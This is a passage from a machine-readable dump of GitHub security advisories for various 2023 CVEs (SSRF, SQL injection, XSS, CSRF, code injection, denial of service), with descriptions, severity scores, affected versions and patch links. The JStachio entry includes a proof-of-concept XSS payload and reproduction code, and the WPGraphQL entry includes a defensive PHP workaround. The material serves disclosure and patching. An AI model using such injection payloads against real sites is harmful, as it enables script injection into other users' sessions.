'https://github.com/Studio-42/elFinder'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T16:37:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-cfh4-7wq9-6pgg,2023-06-30T20:35:37Z,2023-06-30T20:35:37Z,,['CVE-2023-23684'],WPGraphQL Plugin vulnerable to Server Side Request Forgery (SSRF),"### Impact Users with capabilities to upload media (editors and above) are succeptible to SSRF (Server-Side Request Forgery) when executing the `createMediaItem` Mutation. Authenticated users making GraphQL requests that execute the `createMediaItem` could pass executable paths in the mutations `filePath` argument that could give them unwarranted access to the server. It's recommended to update to WPGraphQL v1.14.6 or newer. If you're unable to do so, below is a snippet you can add to your functions.php (or similar) that filters the `createMediaItem` mutation's resolver. ### Patches - [v1.14.6](https://github.com/wp-graphql/wp-graphql/releases/tag/v1.14.6) - https://github.com/wp-graphql/wp-graphql/pull/2840 ### Workarounds If you're unable to upgrade to v1.14.6 or higher, you should be able to use the following snippet in your functions.php to override the vulnerable resolver. This snippet has been tested as far back as WPGraphQL v0.15 ```php add_filter( 'graphql_pre_resolve_field', function( $nil, $source, $args, $context, \GraphQL\Type\Definition\ResolveInfo $info, $type_name, $field_key, $field, $field_resolver ) { if ( $info->fieldName !== 'createMediaItem' ) { return $nil; } $input = $args['input'] ?? null; if ( ! isset( $input['filePath'] ) ) { return $nil; } $uploaded_file_url = $input['filePath']; // Check that the filetype is allowed $check_file = wp_check_filetype( $uploaded_file_url ); // if the file doesn't pass the check, throw an error if ( ! $check_file['ext'] || ! $check_file['type'] || ! wp_http_validate_url( $uploaded_file_url ) ) { throw new \GraphQL\Error\UserError( sprintf( __( 'Invalid filePath ""%s""', 'wp-graphql' ), $input['filePath'] ) ); } $protocol = wp_parse_url( $input['filePath'], PHP_URL_SCHEME ); // prevent the filePath from being submitted with a non-allowed protocols $allowed_protocols = [ 'https', 'http', 'file' ]; if ( ! in_array( $protocol, $allowed_protocols, true ) ) { throw new \GraphQL\Error\UserError( sprintf( __( 'Invalid protocol. ""%1$s"". Only ""%2$s"" allowed.', 'wp-graphql' ), $protocol, implode( '"", ""', $allowed_protocols ) ) ); } return $nil; }, 10, 9 ); ``` ### References - https://patchstack.com/database/vulnerability/wp-graphql/wordpress-wp-graphql-plugin-1-14-5-server-side-request-forgery-ssrf-vulnerability ",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'wp-graphql/wp-graphql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.14.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-cfh4-7wq9-6pgg'}, {'type': 'WEB', 'url': 'https://github.com/wp-graphql/wp-graphql/pull/2840'}, {'type': 'PACKAGE', 'url': 'https://github.com/wp-graphql/wp-graphql'}, {'type': 'WEB', 'url': 'https://github.com/wp-graphql/wp-graphql/releases/tag/v1.14.6'}]","{'cwe_ids': ['CWE-918'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:35:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-4xf2-7qfv-mgfx,2023-06-16T22:14:34Z,2023-06-16T15:30:19Z,,['CVE-2023-35782'],ipandlanguageredirect extension vulnerable to SQL Injection,The ipandlanguageredirect extension before 5.1.2 for TYPO3 allows SQL Injection.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'in2code/ipandlanguageredirect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35782'}, {'type': 'WEB', 'url': 'https://github.com/einpraegsam/ipandlanguageredirect/commit/d80eb99e739a09984ad0ea94b12380236346ae42'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/in2code/ipandlanguageredirect/CVE-2023-35782.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/einpraegsam/ipandlanguageredirect'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2023-005'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T22:14:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-5cc8-pgp5-7mpm,2023-06-30T20:30:30Z,2023-06-30T20:30:30Z,,['CVE-2023-1664'],Keycloak Untrusted Certificate Validation vulnerability,"A flaw was found in keycloak-core. This flaw considers the scenario when using X509 Client Certificate Authenticatior with the option ""Revalidate Client Certificate"". A user may be able to choose, if directly connect to keycloak (not passing via reverse proxy) a specific certificate. If there's a configuration error in KC_SPI_TRUSTSTORE_FILE_FILE the authenticator allows even with the ""Cannot validate client certificate trust: Truststore not available"" message as there's no certificate to trust against.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-5cc8-pgp5-7mpm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1664'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-1664'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2182196&comment#0'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:30:30Z', 'nvd_published_at': None}" 1.4.0,GHSA-xwc8-rf6m-xr86,2023-07-07T18:40:19Z,2023-06-30T21:30:26Z,,['CVE-2023-37365'],hnswlib Double Free vulnerability,Hnswlib 0.7.0 has a double free in `init_index` when the M argument is a large integer.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'hnswlib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37365'}, {'type': 'WEB', 'url': 'https://github.com/nmslib/hnswlib/issues/467'}, {'type': 'PACKAGE', 'url': 'https://github.com/nmslib/hnswlib'}]","{'cwe_ids': ['CWE-415'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T22:12:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-ff3m-68vj-h86p,2023-06-27T17:15:16Z,2023-06-27T15:30:29Z,,['CVE-2023-3432'],PlantUML Server-Side Request Forgery vulnerability,Server-Side Request Forgery (SSRF) in GitHub repository plantuml/plantuml prior to 1.2023.9.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.sourceforge.plantuml:plantuml-mit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2023.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3432'}, {'type': 'WEB', 'url': 'https://github.com/plantuml/plantuml/commit/b32500bb61ae617bb312496d6d832e4be8190797'}, {'type': 'PACKAGE', 'url': 'https://github.com/plantuml/plantuml'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8ac3316f-431c-468d-87e4-3dafff2ecf51'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-27T17:15:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-gwxv-jv83-6qjr,2023-06-06T00:45:18Z,2023-06-06T00:45:18Z,,['CVE-2023-33962'],JStachio XSS vulnerability: Unescaped single quotes,"### Impact #### Description: JStachio fails to escape single quotes `'` in HTML, allowing an attacker to inject malicious code. #### Reproduction Steps: Use the following template code: ```html
``` Set the value variable to `' onblur='alert(1)`. ```java public class Escaping { public static void main(String[] args) { Model model = new Model(""' onblur='alert(1)""); String result = AttributeTemplate.of().execute(model); System.out.println(result); } @JStache(template = ""
"", name=""AttributeTemplate"") @JStacheConfig(contentType= Html.class) public static class Model { public final String value; public Model(String value) { this.value = value; } public String getValue() { return value; } } } ``` Expected Result: The resulting output should have properly escaped the single quotes and not execute the injected JavaScript code. Actual Result: The resulting output is vulnerable and renders as follows: ```html
``` #### Impact and Risk: This vulnerability can be exploited by an attacker to execute arbitrary JavaScript code in the context of other users visiting pages that use this template engine. This can lead to various consequences, including session hijacking, defacement of web pages, theft of sensitive information, or even the propagation of malware. #### Proposed Solution: To mitigate this vulnerability, the template engine should properly escape special characters, including single quotes. Common practice is to escape `'` as `'`. ### Patches - ### Workarounds As long as users stick with double quotes `""` for HTML attributes, they should not be affected. ### References For instance, [Rocker's general purpose HTML escaping](https://github.com/fizzed/rocker/blob/d749fbf68179b31a64d541f5e18e0e25bc5c2d1b/rocker-runtime/src/main/java/com/fizzed/rocker/runtime/DefaultHtmlStringify.java#L64) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jstach:jstachio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jstachio/jstachio/security/advisories/GHSA-gwxv-jv83-6qjr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33962'}, {'type': 'WEB', 'url': 'https://github.com/jstachio/jstachio/issues/157'}, {'type': 'WEB', 'url': 'https://github.com/jstachio/jstachio/pull/158'}, {'type': 'WEB', 'url': 'https://github.com/jstachio/jstachio/commit/7b2f78377d1284df14c580be762a25af5f8dcd66'}, {'type': 'PACKAGE', 'url': 'https://github.com/jstachio/jstachio'}, {'type': 'WEB', 'url': 'https://github.com/jstachio/jstachio/releases/tag/v1.0.1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T00:45:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-rvrx-rrwh-r9p6,2023-06-16T17:53:52Z,2023-06-06T16:44:58Z,,['CVE-2023-33958'],Notation's default `maxSignatureAttempts` in `notation verify` enables an endless data attack,"### Impact An attacker who controls or compromises a registry can make the registry serve an infinite number of signatures for the artifact, causing a denial of service to the host machine running `notation verify`. ### Patches The problem has been fixed in the release [v1.0.0-rc.6](https://github.com/notaryproject/notation/releases/tag/v1.0.0-rc.6). Users should upgrade their notation packages to [v1.0.0-rc.6](https://github.com/notaryproject/notation/releases/tag/v1.0.0-rc.6) or above. ### Workarounds User should use secure and trusted container registries ### Credits The `notation` project would like to thank Adam Korczynski (@AdamKorcz) for responsibly disclosing the issue found during an security audit (facilitated by OSTIF and sponsored by CNCF) and Shiwei Zhang (@shizhMSFT) for root cause analysis.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/notaryproject/notation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/notaryproject/notation/security/advisories/GHSA-rvrx-rrwh-r9p6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33958'}, {'type': 'PACKAGE', 'url': 'https://github.com/notaryproject/notation'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation/releases/tag/v1.0.0-rc.6'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:44:58Z', 'nvd_published_at': None}" 1.4.0,GHSA-5h3x-9wvq-w4m2,2023-06-08T18:03:11Z,2023-06-08T18:03:11Z,,['CVE-2023-34234'],OpenZeppelin Contracts's governor proposal creation may be blocked by frontrunning,"### Impact By frontrunning the creation of a proposal, an attacker can become the proposer and gain the ability to cancel it. The attacker can do this repeatedly to try to prevent a proposal from being proposed at all. This impacts the `Governor` contract in v4.9.0 only, and the `GovernorCompatibilityBravo` contract since v4.3.0. ### Patches The problem has been patched in 4.9.1 by introducing opt-in frontrunning protection. ### Workarounds Submit the proposal creation transaction to an endpoint with frontrunning protection. ### Credit Reported by Lior Abadi and Joaquin Pereyra from Coinspect. ### References https://www.coinspect.com/openzeppelin-governor-dos/","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.9.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.9.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-5h3x-9wvq-w4m2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34234'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/commit/d9474327a492f9f310f31bc53f38dbea56ed9a57'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/releases/tag/v4.9.1'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-08T18:03:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-r72x-2h45-p59x,2023-06-26T22:44:10Z,2023-06-14T15:30:37Z,,['CVE-2023-35148'],Jenkins Digital.ai App Management Publisher Plugin vulnerable to Cross-Site Request Forgery,"Jenkins Digital.ai App Management Publisher Plugin 2.6 and earlier does not perform permission checks in several HTTP endpoints. This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:ease-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35148'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/ease-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2911'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/14/5'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:32:58Z', 'nvd_published_at': None}" 1.4.0,GHSA-jqxr-vjvv-899m,2023-06-14T14:54:06Z,2023-06-14T14:54:06Z,,['CVE-2023-34247'],@keystone-6/auth Open Redirect vulnerability,"### Summary There is an open redirect in the `@keystone-6/auth` package, where the redirect leading `/` filter can be bypassed. ### Impact Users may be redirected to domains other than the relative host, thereby it might be used by attackers to re-direct users to an unexpected location. ### Mitigations - Don't use the `@keystone-6/auth` package ### References - [CWE-601: URL Redirection to Untrusted Site ('Open Redirect')](https://cwe.mitre.org/data/definitions/601.html) - [OWASP: Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html) #### Similar Vulnerability Reports - [CVE-2023-0748](https://nvd.nist.gov/vuln/detail/CVE-2023-0748) - [CVE-2022-2252](https://nvd.nist.gov/vuln/detail/CVE-2022-2252) #### Credits Thanks to [morioka12](https://github.com/scgajge12) for reporting this problem. If you have any questions around this security advisory, please don't hesitate to contact us at [security@keystonejs.com](mailto:security@keystonejs.com), or [open an issue on GitHub](https://github.com/keystonejs/keystone/issues/new/choose). If you have a security flaw to report for any software in this repository, please see our [SECURITY policy](https://github.com/keystonejs/keystone/blob/main/SECURITY.md). ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@keystone-6/auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/keystonejs/keystone/security/advisories/GHSA-jqxr-vjvv-899m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34247'}, {'type': 'WEB', 'url': 'https://github.com/keystonejs/keystone/pull/8626'}, {'type': 'PACKAGE', 'url': 'https://github.com/keystonejs/keystone'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T14:54:06Z', 'nvd_published_at': None}" 1.4.0,GHSA-xm2m-2q6h-22jw,2023-06-21T13:48:41Z,2023-06-12T18:30:18Z,,['CVE-2023-34468'],Apache NiFi vulnerable to Code Injection,"The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. The resolution validates the Database URL and rejects H2 JDBC locations. You are recommended to upgrade to version 1.22.0 or later which fixes this issue. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.nifi:nifi-dbcp-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.2'}, {'fixed': '1.22.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.nifi:nifi-hikari-dbcp-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.2'}, {'fixed': '1.22.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34468'}, {'type': 'WEB', 'url': 'https://github.com/apache/nifi/pull/7349'}, {'type': 'WEB', 'url': 'https://github.com/apache/nifi/commit/4faf3ea59895e7e153db3f8f61147ff70a254361'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/nifi'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/NIFI-11653'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8'}, {'type': 'WEB', 'url': 'https://nifi.apache.org/security.html#CVE-2023-34468'}, {'type': 'WEB', 'url': 'https://www.cyfirma.com/outofband/apache-nifi-cve-2023-34468-rce-vulnerability-analysis-and-exploitation/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/174398/Apache-NiFi-H2-Connection-String-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/12/3'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T20:29:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-4cw3-rhqx-vqwr,2023-06-27T21:58:46Z,2023-06-20T15:31:08Z,,['CVE-2020-20726'],GilaCMS Cross Site Request Forgery vulnerability,Cross Site Request Forgery vulnerability in Gila GilaCMS v.1.11.4 allows a remote attacker to execute arbitrary code via the `cm/update_rows/user` parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'gilacms/gila'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.11.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-20726'}, {'type': 'WEB', 'url': 'https://github.com/GilaCMS/gila/issues/51'}, {'type': 'PACKAGE', 'url': 'https://github.com/GilaCMS/gila'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T18:36:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-gcg6-xv4f-f749,2023-06-09T15:02:18Z,2023-06-01T15:30:59Z,,['CVE-2023-33546'],janino vulnerable to denial of service due to stack overflow,"janino 3.1.9 and earlier is subject to denial of service (DOS) attacks when using the expression `evaluator.guess` parameter name method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash due to a stack overflow.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.codehaus.janino:janino-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33546'}, {'type': 'WEB', 'url': 'https://github.com/janino-compiler/janino/issues/201'}, {'type': 'PACKAGE', 'url': 'https://github.com/janino-compiler/janino'}, {'type': 'WEB', 'url': 'https://janino-compiler.github.io/janino/#security'}]","{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:03:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-46v3-ggjg-qq3x,2023-06-06T01:59:54Z,2023-06-06T01:59:54Z,,['CVE-2022-43760'],Rancher UI has multiple Cross-Site Scripting (XSS) issues,"### Impact Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in the Rancher UI. Cross-Site scripting allows a malicious user to inject code that is executed within another user's browser, allowing the attacker to steal sensitive information, manipulate web content, or perform other malicious activities on behalf of the victims. This could result in a user with write access to the affected areas being able to act on behalf of an administrator, once an administrator opens the affected web page. The affected areas include the Projects/Namespaces and Auth Provider sections. The attacker needs to be authenticated and have write access to those features in order to exploit the vulnerabilities. Some of the permissions (roles) required are: - Project Owner. - Restricted Admin. - Configure Authentication. - Administrator. - Custom RBAC Role that provides write access on Projects or External Authentication Providers. For users that suspect this vulnerability may have targeted their Rancher instance, we recommend rotating all API Keys and Kubeconfig tokens. It's also advised to review logs and possibly rotate credentials stored as secrets in Rancher and downstream cluster, if you believe that users' credentials to access Rancher and its clusters might have been compromised. ### Patches Patched versions include releases `2.6.13`, `2.7.4` and later versions. ### Workarounds There is no direct mitigation besides updating Rancher to a patched version. ### Credits We would like to recognize and thank @bybit-sec for the responsible disclosure of this security issue. ### For more information If you have any questions or comments about this advisory: - Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries. - Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository. - Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rancher/rancher/security/advisories/GHSA-46v3-ggjg-qq3x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-43760'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=CVE-2022-43760'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.6.13'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.7.4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:59:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-62v2-xwh3-5gvx,2023-06-14T20:30:21Z,2023-06-14T15:30:37Z,,['CVE-2023-35146'],Jenkins Template Workflows Plugin vulnerable to Stored Cross-site Scripting,"Jenkins Template Workflows Plugin 41.v32d86a_313b_4a and earlier does not escape names of jobs used as buildings blocks for Template Workflow Job. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create jobs.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins.plugin.templateWorkflows:template-workflows'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '41.v32d86a'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35146'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3166'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/14/5'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:30:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-4wc6-hqv9-qc97,2023-06-23T19:41:52Z,2023-06-20T16:47:13Z,,['CVE-2023-35153'],XWiki Platform vulnerable to stored cross-site scripting in ClassEditSheet page via name parameters,"### Impact A stored XSS can be exploited by users with edit rights by adding a `AppWithinMinutes.FormFieldCategoryClass` class on a page and setting the payload on the page title. Then, any user visiting `/xwiki/bin/view/AppWithinMinutes/ClassEditSheet` executes the payload. See https://jira.xwiki.org/browse/XWIKI-20365 for me details. ### Patches The issue has been patched on XWiki 14.4.8, 14.10.4, and 15.0 ? ### Workarounds The issue can be fixed by updating `AppWithinMinutes.ClassEditSheet` with this [patch](https://github.com/xwiki/xwiki-platform/commit/1b87fec1e5b5ec00b7a8c3c3f94f6c5e22547392#diff-79e725ec7125cced7d302e1a1f955a76745af26ef28a148981b810e85335d302). ### References - https://github.com/xwiki/xwiki-platform/commit/1b87fec1e5b5ec00b7a8c3c3f94f6c5e22547392#diff-79e725ec7125cced7d302e1a1f955a76745af26ef28a148981b810e85335d302 - https://jira.xwiki.org/browse/XWIKI-20365 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution This vulnerability has been reported on Intigriti by René de Sain @renniepak. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-appwithinminutes-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.4.4'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-appwithinminutes-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-appwithinminutes-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-4wc6-hqv9-qc97'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35153'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/1b87fec1e5b5ec00b7a8c3c3f94f6c5e22547392#diff-79e725ec7125cced7d302e1a1f955a76745af26ef28a148981b810e85335d302'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20365'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:47:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-gh24-9qjj-mr67,2023-06-14T17:18:10Z,2023-06-14T17:18:10Z,,['CVE-2023-33126'],Microsoft Security Advisory CVE-2023-33126: .NET Remote Code Execution Vulnerability,"# Microsoft Security Advisory CVE-2023-33126: .NET 